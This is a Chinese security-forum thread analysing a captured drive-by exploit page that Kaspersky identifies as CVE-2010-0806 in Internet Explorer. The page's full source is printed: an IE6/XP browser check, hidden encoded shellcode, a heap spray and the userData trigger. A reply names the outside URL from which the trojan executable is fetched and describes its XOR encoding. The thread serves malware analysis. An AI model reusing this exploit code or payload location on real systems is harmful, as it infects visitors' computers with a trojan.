求助分析（解决方法在2L）

幸福的猪猪

1. <SCRIPT LANGUAGE="JavaScript">
   
2. <!-- Hide
   
3. function killErrors() {
   
4. return true;
   
5. }
   
6. window.onerror = killErrors;
   
7. // -->
   
8. </SCRIPT>
   
9. 
   
10. <script>
    
11. nav=navigator.userAgent.toLowerCase();
    
12. wxp=((nav.indexOf('\x77\x69\x6e\x64\x6f\x77\x73\x20\x6e'+'\x74\x20\x35\x2e\x31')!=-1)||(nav.indexOf
    
13. ('windows xp')!=-1));
    
14. if(!wxp||navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69\x65 \x36")==-1)
    
15. location.replace("about:blank");
    
16. </script>
    
17. <div id=sun style='display:none'>MM528384NNXX%u0C0C%u6090%u1CEB%u4B5B%uC933%uB966%u041A%u3B81%u2BFF%uC152%u850F%u0273%u0000%u3480%uC20B%uFAE2%u05EB%uDFE8%uFFFF%u2BFF%uC152%uC2C2%uA69D%uF263%uC2C2%u49C2%uCE82%uB249%u6FDE%uAA49%u49CA%uA835%u9BCD%uF22A%uC2C1%u52C2%u3A20%uF1AA%uC2F0%uAAC2%uB197%uB0A7%u4996%uCE84%u422A%uC2C0%u49C2%uA82A%u9BC3%uD22A%uC2C1%u20C2%uAA3B%uACAD%uC2C2%uB7AA%uAEB0%u96AF%uD43D%u0247%uD1B7%uADAA%uC2AC%uAAC2%uB0B7%uAFAE%u4996%uCE84%u922A%uC2C0%u49C2%uA82A%u9BC3%u222A%uC2C0%u20C2%uAA3B%uF1AE%uC2F0%uB1AA%uA7AA%u96AE%u8449%u2ACE%uC0F3%uC2C2%u2A49%uC3A8%u2A9B%uC003%uC2C2%u3B20%u2E43%uC3C2%uC2C2%u1E49%u0143%uC242%uC2C2%uC2A8%uD8A8%uA891%u3DC2%u8694%u02F1%u4282%uC1FE%uB7C2%u4B3B%u5244%uC2C2%u05C2%uC1C6%uA39E%uA7EC%u8605%uC6C1%uA7BA%uC2C2%u0BF1%u9393%u9591%uF193%u4902%u8284%u1C2A%uC2C3%u41C2%uC23A%u47CD%uC34E%uC2C2%uC2A8%uC2A8%uC1A8%uC2A8%uC0A8%uC2AA%uC2C2%u9102%u8449%u2AE6%uC37F%uC2C2%u3A41%uCD3D%uA946%uC2C3%u4BC2%uA284%uC2A8%u3D92%uEA94%u844B%u49A6%u5244%uC2C2%u05C2%uC1C6%uA09E%uA7EC%u8605%uC6C1%uA7BA%uC2C2%uC2A8%uC2A8%uC0A8%uC2A8%uC2A8%uC2AA%uC2C2%u9182%u8449%u2AE6%uC3B9%uC2C2%u3A41%uCD3D%uEB46%uC2C3%u4BC2%u4644%uC2C2%u4BC2%u4E5C%uC2C2%u49C2%uA284%uC2A8%uC2A8%uC2A8%u8449%u92A2%u943D%u05FA%uB284%uC2C2%uC2C2%u8405%uC2B6%uC2C2%u43C2%uC205%uC2C0%uF1C2%u4919%uA69C%uC2A8%u844F%u92B2%uC2AA%uC2C6%u95C2%uB43D%u3DA2%uC694%u0BF1%uC27B%uC2C6%u42C2%uCDBE%u573D%uCEB6%uBE42%u3DCD%uB6C2%u42C7%uCDB6%u573D%u2920%u0149%uC2EF%uC2C6%u41C2%uC23A%uC1BD%u9C4B%uA8B2%u4FC2%uB684%u3D92%uB2B4%u3D95%u4674%uC2C2%u3DC2%uF294%u2943%uC6C2%uC2C2%u3941%uBDC2%u3D67%uA2B4%u943D%u3DF6%u4674%uC2C2%u3DC2%uF694%u4449%uC252%uC2C2%u5C49%uC24E%uC2C2%uC605%u9EC1%uECA3%u91A7%u943D%u49EE%u4E7C%uC2C2%u49C2%u5244%uC2C2%u05C2%uC5C6%uA09E%uA7EC%u2E43%uC3C2%uC2C2%u1E49%uC2AA%uC2C3%u91C2%uC2AA%uC2C3%u95C2%uC2A8%uC2A8%u943D%u49DE%uF139%uF102%u4319%uC22E%uC2C0%u49C2%u410E%u963A%uCABF%uDE4B%u41C3%uC602%u3129%u0E49%u1B49%u0141%uF1D2%u9202%u9193%u9292%u9292%u9292%u9295%u4992%uCA84%u442A%uC2C2%u43C2%uDA06%uC2C6%uA3C2%uC47A%uC0C2%u0142%uC2A8%u943D%uA6D6%uF263%uC2C2%u49C2%uCE82%uB249%u6FDE%uAA49%u49CA%u4B35%uA694%uC6A8%u2A9B%uC203%uC2C2%u2052%uAA3A%uF0F1%uC2C2%u97AA%uA7B1%u96B0%uC449%uD02A%uC2C2%u49C2%uA82A%u9BC7%u602A%uC2C2%u20C2%uF13B%u953D%u943D%u42C6%u2AFA%uD0B6%uFA42%uB62B%u42CF%u29FA%uCAB6%u223D%uA22A%uC2C2%u01C2%uBA43%u52C7%u5252%uB652%u49CA%u973D%u2E49%u824F%u3DC7%u2A22%uC285%uC2C2%u4201%u2AFA%uD0B6%uFA42%uB62B%u42CF%u29FA%uCAB6%u223D%uF22A%uC2C2%u01C2%uBA43%u52C7%u5252%uB652%uAA1A%uC8CA%uC2C2%u824F%u3DC7%u2A22%uC2D5%uC2C2%u2A01%uC2D3%uC2C2%uD37A%uC6C3%u0042%uC2CE%uC029%u019A%u3B2A%u3D3D%u993D%uC504%u4B7A%uC39D%u05A4%uC785%u223D%u9101%u1E49%uA891%uAA82%uD2C2%uC2C2%u4995%uE284%uAA2A%u3D3D%u9A3D%u9301%u4994%uFEB7%uB649%uBAEC%u37C1%u4994%uE2B4%u37C1%u0BF1%u838B%uC16F%uF107%uCD19%uD27C%u14F8%uCAB6%u0903%uC1C5%u8218%u3329%uDDF9%u25B7%u499C%uE69C%u1FC1%u49A4%u89CE%u9C49%uC1DE%u491F%u49C6%u07C1%u9C69%u019B%uA92A%u3D3E%u703D%u2030%u7036%uCDF4%u32D1%uB98A%uF0FF%u53B6%u47CE%u6D1D%uA179%u134B%u938D%u7882%uC5BD%uE050%uDCB2%uA666%u512D%u26F0%u4C56%uC8D1%uBB6E%u24FB%u065A%uDD4F%u95B6%uCFA4%u813D%u6E7C%u5A19%uD2C8%u423A%u6D14%u3958%uD791%uAAA4%uB6B6%uF8B2%uEDED%uB5B5%uECB5%uAAB1%uF3B7%uA1EC%uAFAD%uA1ED%uAFAD%uABB2%uA7AE%uEDA6%uA7B6%uB2AF%uA3AE%uA7B6%uEDB1%uAEA0%uA1AD%uB1A9%uA1ED%uECFB%uBAA7%uC2A7%uC2C2%u5YY</div>
    
18. <BUTTON ID='EXP' ONCLICK='exp();' STYLE='DISPLAY:NONE'></BUTTON>
    
19. <script language="JavaScript">
    
20. function code()
    
21. {
    
22. var div=document.getElementById('sun');
    
23. var decode=div.innerHTML;
    
24. var x=decode.indexOf('MM');
    
25. var y=decode.indexOf('NN');
    
26. var xxcode=decode.substring(x+2,y);
    
27. return xxcode;
    
28. }
    
29. function sc()
    
30. {
    
31. var div=document.getElementById('sun');
    
32. var decode=div.innerHTML;
    
33. var x=decode.indexOf('XX');
    
34. var y=decode.indexOf('YY')
    
35. var cc=decode.substring(x+2,y);
    
36. cc=unescape(cc);
    
37. return cc;
    
38. }
    
39. 
    
40. function exp()
    
41. {
    
42. var d=document.createElement('DIV');
    
43. d.addBehavior('#default#userData');
    
44. document.appendChild(d);
    
45. try{for (i=0;i<10;i++)
    
46. {d.setAttribute('s',window);}}
    
47. catch(e){}
    
48. window.status+='';
    
49. }
    
50. var memory;
    
51. var temptest = decodeURI(',sun,0c0c,sun,0c0c');
    
52. var nop=unescape(temptest.replace(/,sun,/g,'%u'));
    
53. var SC=sc();
    
54. var xcode=code()-SC.length*2;
    
55. while(nop.length <= xcode) nop+=nop;
    
56. nop=nop.substring(0,xcode - SC.length);
    
57. memory=new Array();
    
58. for(i=0;i<0x100;i++){memory[i]=nop + SC;}
    
59. 
    
60. CollectGarbage();
    
61. document.getElementById('EXP').onclick();
    
62. </script>
    

复制代码

这个挂马网页要怎么弄，下载回来的疑似木马程序，好像不是pe文件。（不会是还要经过一道解密程序吧？）

卡巴斯基给予这个挂马网页的入库定义为：

[KLAN-64990853]
您好，

123.js_ - Exploit.JS.CVE-2010-0806.c

以上文件包含恶意代码，下次更新后即可查杀。感谢您的上报。

回复时请引用全部邮件。

--

卡巴斯基中国病毒实验室

qianwenxiang

http://www.shu1.com/compiled/templates/blocks/c9.exe
下载回来文件一部分需要xor 0x95  看样子是作者大脑短路了。。

幸福的猪猪

回复 2# qianwenxiang

谢谢你的解答。

我还以为遇上新的加密网页了呢，原来是病毒样本的编写者那边出的问题.

qianwenxiang

我知道了 经由这样处理的文件在通过漏洞下载回来之后才是正常的文件 等下我做个测试

qianwenxiang

测试完了。。确实这么处理过的exe在通过这个所谓的。。极风（。。是叫这个吧）漏洞下载到机子上之后会变成正常文件。。

MD5: 2472F650FFE110E7F7B63DF183BA5247
UPX 0.89.6 - 1.02 / 1.05 - 1.22 -> Markus & Lazlo

IllusionWing

为啥

qianwenxiang

回复 6# IllusionWing


    从现象上来讲，三个字，“就这样”；从原理上面来讲，也是三个字，“不知道”

250662772

还真是,直接下载下来的不是pe文件

雨宫优子

围观强人....

asinasina

虎虎虎...学习了...